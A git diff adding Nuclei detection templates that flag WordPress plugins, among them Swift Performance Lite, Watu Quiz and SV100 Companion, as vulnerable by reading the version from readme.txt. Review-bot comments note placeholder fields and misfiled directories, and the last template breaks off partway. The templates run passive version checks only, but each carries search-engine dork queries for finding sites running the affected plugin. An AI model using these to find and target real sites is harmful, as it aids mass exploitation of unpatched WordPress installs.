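Review bot: A `critical` result from this template rests only on the `Version:` string read from `style.css` and the word `soledad` in the same body; nothing in the matchers touches the file-inclusion behaviour itself. That is a reasonable passive check, but the output gives the person triaging it no hint that the rating is inferred. I would put a comment on the dsl matcher, `# version-inferred: confirm the installed theme version before treating as critical`, and say the same in the empty `description`. The swift-performance-lite (`critical`) and sv100-companion (`high`) hunks report on the same basis.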
diff --git a/poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml b/poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml
new file mode 100644
index 0000000000..26d182690a
--- /dev/null
+++ b/poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml
@@ -0,0 +1,59 @@
+id: sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19
+
+info:
+ name: >
+ Sparkle Elementor Kit <= 2.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3557cd1e-cfb4-4f08-af3c-be5211a325c1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/sparkle-elementor-kit/"
+ google-query: inurl:"/wp-content/plugins/sparkle-elementor-kit/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,sparkle-elementor-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sparkle-elementor-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sparkle-elementor-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.9')
\ No newline at end of file
diff --git a/poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml b/poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml
new file mode 100644
index 0000000000..a31cef8c24
--- /dev/null
+++ b/poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml
@@ -0,0 +1,59 @@
+id: splash-connector-a408956eb25c0fc5ebb6237dc9efaaab
+
+info:
+ name: >
+ Splash Sync <= 2.0.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/splash-connector/"
+ google-query: inurl:"/wp-content/plugins/splash-connector/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,splash-connector,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/splash-connector/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "splash-connector"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml b/poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml
new file mode 100644
index 0000000000..af57100f12
--- /dev/null
+++ b/poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml
@@ -0,0 +1,59 @@
+id: sv100-companion-9407692ccefc1b1607863a7068a9481a
+
+info:
+ name: >
+ SV100 Companion <= 2.0.02 - Missing Authorization to Unuathenticated Arbitrary Options Update
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/sv100-companion/"
+ google-query: inurl:"/wp-content/plugins/sv100-companion/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,sv100-companion,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sv100-companion/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sv100-companion"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.02')
\ No newline at end of file
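Review bot: The `name` field misspells "Unauthenticated" as `Unuathenticated`, so a search or filter on the template title for unauthenticated issues will miss this `high` entry. If the title is copied from the upstream feed it is still worth correcting locally: `SV100 Companion <= 2.0.02 - Missing Authorization to Unauthenticated Arbitrary Options Update`.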
diff --git a/poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml b/poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml
new file mode 100644
index 0000000000..520c924944
--- /dev/null
+++ b/poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml
@@ -0,0 +1,59 @@
+id: swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6
+
+info:
+ name: >
+ Swift Performance Lite <= 2.3.7.1 - Unauthenticated Local PHP File Inclusion via 'ajaxify'
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/swift-performance-lite/"
+ google-query: inurl:"/wp-content/plugins/swift-performance-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,swift-performance-lite,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/swift-performance-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "swift-performance-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.7.1')
\ No newline at end of file
diff --git a/poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml b/poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml
new file mode 100644
index 0000000000..fc39063e3a
--- /dev/null
+++ b/poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml
@@ -0,0 +1,59 @@
+id: twentytwenty-008f64526c3780ff8f14b386a2edcab8
+
+info:
+ name: >
+ TwentyTwenty <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f805982-1141-4e28-b28c-93483646cf99?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/twentytwenty/"
+ google-query: inurl:"/wp-content/plugins/twentytwenty/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,twentytwenty,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/twentytwenty/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "twentytwenty"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
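Review bot: The `info` block is committed with placeholder values: `description: >` has no text, `cvss-metrics:`, `cvss-score:` and `cve-id:` are bare keys that parse as null, `shodan-query: 'vuln:'` has nothing after the prefix, and `tags` still starts with `cve` although no CVE is given. Anyone filtering on the `cve` tag or reading the classification gets misleading results. I would drop the empty keys and the `cve` tag until the data exists, e.g. `tags: wordpress,wp-plugin,twentytwenty,low`, and fill `description` from the Wordfence advisory listed under `reference`. The same placeholders appear in the swift-performance-lite hunk above and in every hunk below up to spatialmatch-free-lifestyle-search.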
diff --git a/poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml b/poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml
new file mode 100644
index 0000000000..a1860df96d
--- /dev/null
+++ b/poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml
@@ -0,0 +1,59 @@
+id: uber-grid-356fe3fbd1593fabd8654043fb4bf3f8
+
+info:
+ name: >
+ WordPress Portfolio Builder – Portfolio Gallery <= 1.1.7 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25626f3-d9a9-4aad-8f5f-45f72d0711e1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/uber-grid/"
+ google-query: inurl:"/wp-content/plugins/uber-grid/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,uber-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/uber-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "uber-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.7')
\ No newline at end of file
diff --git a/poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml b/poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml
new file mode 100644
index 0000000000..3bc842890d
--- /dev/null
+++ b/poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml
@@ -0,0 +1,59 @@
+id: ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Authenticated (Subscriber+) Template Name Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bef108a-2c68-4347-bf53-559b2d877f6b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml b/poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml
new file mode 100644
index 0000000000..bbc280226c
--- /dev/null
+++ b/poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml
@@ -0,0 +1,59 @@
+id: ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Unauthenticated Template Activation
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml b/poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml
new file mode 100644
index 0000000000..980af8d721
--- /dev/null
+++ b/poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml
@@ -0,0 +1,59 @@
+id: watu-690d8bcd0e263bad7d88f01f7c626e23
+
+info:
+ name: >
+ Watu Quiz <= 3.4.1.2 - Authenticated (Contributor+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3aa8d64-a0d1-49ad-ad92-e2a2bf066fe1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/watu/"
+ google-query: inurl:"/wp-content/plugins/watu/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,watu,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/watu/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "watu"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.4.1.2')
\ No newline at end of file
diff --git a/poc/other/wip-woocarousel-lite.yaml b/poc/other/wip-woocarousel-lite.yaml
new file mode 100644
index 0000000000..c4337b4d33
--- /dev/null
+++ b/poc/other/wip-woocarousel-lite.yaml
@@ -0,0 +1,59 @@
+id: wip-woocarousel-lite
+
+info:
+ name: >
+ WIP WooCarousel Lite <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wip-woocarousel-lite/"
+ google-query: inurl:"/wp-content/plugins/wip-woocarousel-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wip-woocarousel-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wip-woocarousel-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wip-woocarousel-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
diff --git a/poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml b/poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml
new file mode 100644
index 0000000000..7761e007b1
--- /dev/null
+++ b/poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml
@@ -0,0 +1,59 @@
+id: woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347
+
+info:
+ name: >
+ PDF Builder for WooCommerce. Create invoices,packing slips and more <= 1.2.136 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woo-pdf-invoice-builder/"
+ google-query: inurl:"/wp-content/plugins/woo-pdf-invoice-builder/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woo-pdf-invoice-builder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-pdf-invoice-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-pdf-invoice-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.136')
\ No newline at end of file
diff --git a/poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml b/poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml
new file mode 100644
index 0000000000..7e54b8105c
--- /dev/null
+++ b/poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml
@@ -0,0 +1,59 @@
+id: xl-tab-40f41253ca6b22bb907999b982dcace4
+
+info:
+ name: >
+ XLTab – Accordions and Tabs for Elementor Page Builder <= 1.4 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/xl-tab/"
+ google-query: inurl:"/wp-content/plugins/xl-tab/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,xl-tab,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/xl-tab/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "xl-tab"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4')
\ No newline at end of file
diff --git a/poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml b/poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml
new file mode 100644
index 0000000000..746e137af3
--- /dev/null
+++ b/poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml
@@ -0,0 +1,59 @@
+id: yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c
+
+info:
+ name: >
+ Yahoo! WebPlayer <= 2.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e043348-c0aa-418f-9120-dcf470f92123?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/yahoo-media-player/"
+ google-query: inurl:"/wp-content/plugins/yahoo-media-player/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,yahoo-media-player,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/yahoo-media-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "yahoo-media-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml b/poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml
new file mode 100644
index 0000000000..3708e5de59
--- /dev/null
+++ b/poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml
@@ -0,0 +1,59 @@
+id: znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8
+
+info:
+ name: >
+ Znajdź Pracę z Praca.pl <= 2.2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e618025-f631-48af-b360-e11524e61be3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/znajdz-prace-z-pracapl/"
+ google-query: inurl:"/wp-content/plugins/znajdz-prace-z-pracapl/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,znajdz-prace-z-pracapl,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/znajdz-prace-z-pracapl/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "znajdz-prace-z-pracapl"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/remote_code_execution/accounting-for-woocommerce.yaml b/poc/remote_code_execution/accounting-for-woocommerce.yaml
new file mode 100644
index 0000000000..e737e22c78
--- /dev/null
+++ b/poc/remote_code_execution/accounting-for-woocommerce.yaml
@@ -0,0 +1,59 @@
+id: accounting-for-woocommerce
+
+info:
+ name: >
+ Accounting for WooCommerce <= 1.6.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/accounting-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/accounting-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,accounting-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/accounting-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "accounting-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
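Review bot: This template is filed under `poc/remote_code_execution/`, but its `name` says Reflected Cross-Site Scripting, and the other four files added to that directory (multilevel-referral-plugin-for-woocommerce, nextcart-woocommerce-migration, ni-woocommerce-cost-of-goods, woocommerce-ultimate-gift-card) are XSS or SQL injection as well. All five slugs contain "woocommerce", so the directory looks like it was chosen by a substring match on "rce"; that is an inference and should be confirmed against the generator. The four `poc/sql/CVE-2024-*` templates shown later in this diff have the same mismatch (stored XSS, authentication bypass, CSRF), while the Watu Quiz SQL injection template sits in `poc/other/`. Anyone who selects templates by directory gets the wrong set, so I would place each file by the class stated in its `name`, or under `poc/other/` when no matching directory exists.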
diff --git a/poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml b/poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml
new file mode 100644
index 0000000000..c1020de4cf
--- /dev/null
+++ b/poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml
@@ -0,0 +1,59 @@
+id: multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f
+
+info:
+ name: >
+ Multilevel Referral Affiliate Plugin for WooCommerce <= 2.27 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c820ff17-718d-4e3a-9a46-7d5a4a573f78?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,multilevel-referral-plugin-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/multilevel-referral-plugin-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "multilevel-referral-plugin-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
